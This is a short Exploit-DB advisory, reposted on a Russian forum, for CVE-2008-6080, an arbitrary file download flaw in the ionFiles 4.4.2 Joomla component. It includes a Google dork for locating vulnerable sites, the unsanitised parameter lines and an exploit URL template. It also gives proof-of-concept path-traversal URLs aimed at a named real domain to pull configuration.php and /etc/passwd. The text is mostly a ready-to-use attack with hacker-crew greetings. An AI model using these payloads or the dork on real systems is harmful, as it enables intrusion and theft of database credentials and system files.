- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6809
- Проверка EDB
-
- Пройдено
- Автор
- VRS-HCK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6080
- Дата публикации
- 2008-10-22
Код:
[o]------------------------------------------------------------------------------------[x]
| Arbitrary File Download Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : ionFiles 4.4.2 Component for Joomla! CMS |
| Vendor : http://forum.codecall.net/ |
| Date : 23 October 2008 |
| Author : Vrs-hCk |
| Contact : d00r[at]telkom[dot]net |
[o]------------------------------------------------------------------------------------[o]
[»] Google Dork
inurl:com_ionfiles
[»] Vulnerable
./download.php
Line 32: $file = $_GET['file'];
Line 33: $download = $_GET['download'];
Line 66 - 91
[»] Exploit
http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1
[»] Proof of Concept
http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
[o]------------------------------------------------------------------------------------[x]
| Greetz |
[o]------------------------------------------------------------------------------------[o]
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org |
| Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius, |
| Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :)) |
[o]------------------------------------------------------------------------------------[o]
# milw0rm.com [2008-10-22]- Источник
- www.exploit-db.com
